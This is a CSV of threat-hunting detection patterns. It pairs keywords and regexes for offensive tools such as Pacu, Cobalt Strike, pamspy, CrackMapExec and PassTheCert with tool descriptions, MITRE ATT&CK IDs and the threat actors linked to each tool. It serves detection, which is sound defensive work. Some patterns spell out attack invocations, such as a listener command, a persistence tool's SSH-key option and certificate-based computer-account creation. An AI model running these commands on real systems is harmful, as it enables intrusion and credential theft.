"*pacu --set-regions *",".{0,1000}pacu\s\-\-set\-regions\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54366"
"*pacu --whoami*",".{0,1000}pacu\s\-\-whoami.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54367"
"*pacu/core pacu*",".{0,1000}pacu\/core\spacu.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54368"
"*pacu/last_update.txt*",".{0,1000}pacu\/last_update\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54369"
"*pacu-master.zip*",".{0,1000}pacu\-master\.zip.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54370"
"*padlock2john.py*",".{0,1000}padlock2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54372"
"*padre -u *http*://*",".{0,1000}padre\s\-u\s.{0,1000}http.{0,1000}\:\/\/.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","0","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","54373"
"*padre-master.zip*",".{0,1000}padre\-master\.zip.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","1","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","54374"
"*pamspy: Failed to increase RLIMIT_MEMLOCK limit!*",".{0,1000}pamspy\:\sFailed\sto\sincrease\sRLIMIT_MEMLOCK\slimit!.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux #content","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","54391"
"*pamspy: Failed to load BPF program: *",".{0,1000}pamspy\:\sFailed\sto\sload\sBPF\sprogram\:\s.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux #content","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","54392"
"*pamspy: Unable to find pam_get_authtok function in*",".{0,1000}pamspy\:\sUnable\sto\sfind\spam_get_authtok\sfunction\sin.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux #content","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","54393"
"*panelqbinglxczi2gqkwderfvgq6bcv5cbjwxrksjtvr5xv7ozh5wqad.onion*",".{0,1000}panelqbinglxczi2gqkwderfvgq6bcv5cbjwxrksjtvr5xv7ozh5wqad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54394"
"*panix.sh --ssh-key *",".{0,1000}panix\.sh\s\-\-ssh\-key\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","54395"
"*papacat -l -p *",".{0,1000}papacat\s\-l\s\-p\s.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","N/A","8","4","309","25","2024-08-21T23:10:08Z","2021-05-11T06:26:10Z","54396"
"*ParamPamPam*",".{0,1000}ParamPamPam.{0,1000}","offensive_tool_keyword","ParamPamPam","This tool is used for brute discover GET and POST parameters.","T1110 - T1210 - T1211","TA0001 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Bo0oM/ParamPamPam","1","1","N/A","N/A","N/A","3","277","61","2022-06-27T11:45:19Z","2018-11-10T08:38:30Z","54397"
"*paranoidninja/badger.bin*",".{0,1000}paranoidninja\/badger\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54398"
"*Parasite Invoke_.-'*",".{0,1000}\-\._\s\s\s\s\s\s\s\s\s\sParasite\sInvoke_\.\-\'.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","54399"
"*pard0p/Cordyceps*",".{0,1000}pard0p\/Cordyceps.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","N/A","10","","N/A","","","","54400"
"*parrot*security.vdi*",".{0,1000}parrot.{0,1000}security\.vdi.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54403"
"*parrotsec.org/download/*",".{0,1000}parrotsec\.org\/download\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54404"
"*Parrot-security-*.iso*",".{0,1000}Parrot\-security\-.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54405"
"*parse the .beacon_keys to RSA private key and public key in pem format*",".{0,1000}parse\sthe\s\.beacon_keys\sto\sRSA\sprivate\skey\sand\spublic\skey\sin\spem\sformat.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","54406"
"*parse_aggressor_properties*",".{0,1000}parse_aggressor_properties.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","54407"
"*parse_nessus_file*",".{0,1000}parse_nessus_file.{0,1000}","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec.  CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","54408"
"*parse_nmap_xml*",".{0,1000}parse_nmap_xml.{0,1000}","offensive_tool_keyword","crackmapexec","function name from nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","54409"
"*parse_shellcode*",".{0,1000}parse_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","54410"
"*ParseGPPPasswordFromXml*",".{0,1000}ParseGPPPasswordFromXml.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","54411"
"*ParseMSALCache*.azure\msal_token_cache.bin*",".{0,1000}ParseMSALCache.{0,1000}\.azure\\msal_token_cache\.bin.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","54412"
"*ParseMSALCache*Appdata\Local\.IdentityService\msal.cache*",".{0,1000}ParseMSALCache.{0,1000}Appdata\\Local\\\.IdentityService\\msal\.cache.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","54413"
"*parser.exe -a *.dmp*",".{0,1000}parser\.exe\s\-a\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","54414"
"*parser.exe -a *.dmp*",".{0,1000}parser\.exe\s\-a\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","54415"
"*PassDetective extract*",".{0,1000}PassDetective\sextract.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","N/A","7","2","129","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z","54416"
"*PassDetective-main.*",".{0,1000}PassDetective\-main\..{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","N/A","7","2","129","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z","54417"
"*passhunt.exe*",".{0,1000}passhunt\.exe.{0,1000}","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Discovery","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","N/A","1","63","30","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z","54418"
"*passhunt.exe*",".{0,1000}passhunt\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","54419"
"*passhunt.py*",".{0,1000}passhunt\.py.{0,1000}","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Discovery","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","N/A","1","63","30","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z","54420"
"*passivex.asm*",".{0,1000}passivex\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54421"
"*passivex.dll*",".{0,1000}passivex\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54422"
"*passphrase-rule1.rule*",".{0,1000}passphrase\-rule1\.rule.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54423"
"*passphrase-rule2.rule*",".{0,1000}passphrase\-rule2\.rule.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54424"
"*passphrase-wordlist*",".{0,1000}passphrase\-wordlist.{0,1000}","offensive_tool_keyword","passphrase-wordlist","This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1.000 permutations of each phase.","T1003 - T1110 - T1113 - T1137","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/initstring/passphrase-wordlist","1","0","N/A","N/A","N/A","10","1297","173","2025-04-12T07:58:51Z","2017-12-05T20:53:13Z","54425"
"*PassSpray.ps1*",".{0,1000}PassSpray\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","54426"
"*PassSpray: Valid Credentials Obtained!*",".{0,1000}PassSpray\:\sValid\sCredentials\sObtained!.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#content","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","54427"
"*pass-station search tomcat*",".{0,1000}pass\-station\ssearch\stomcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54428"
"*PassTheCert.csproj*",".{0,1000}PassTheCert\.csproj.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","54429"
"*PassTheCert.exe*",".{0,1000}PassTheCert\.exe.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","54430"
"*PassTheCert.exe*",".{0,1000}PassTheCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","54431"
"*passthecert.py -action add_computer -crt user.crt -key user.key -domain * -dc-ip *",".{0,1000}passthecert\.py\s\-action\sadd_computer\s\-crt\suser\.crt\s\-key\suser\.key\s\-domain\s.{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54432"
"*passthecert.py*",".{0,1000}passthecert\.py.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","54433"
